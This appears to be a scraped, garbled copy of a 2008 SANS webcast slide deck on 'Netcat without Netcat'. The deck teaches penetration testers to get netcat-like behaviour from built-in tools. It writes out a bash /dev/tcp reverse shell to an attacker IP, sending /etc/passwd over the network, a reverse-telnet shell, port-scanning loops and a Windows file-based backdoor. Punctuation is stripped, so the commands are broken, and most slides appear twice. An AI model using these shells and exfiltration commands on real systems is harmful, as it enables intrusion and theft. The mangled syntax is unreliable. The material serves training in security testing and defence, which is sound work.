bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 10
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
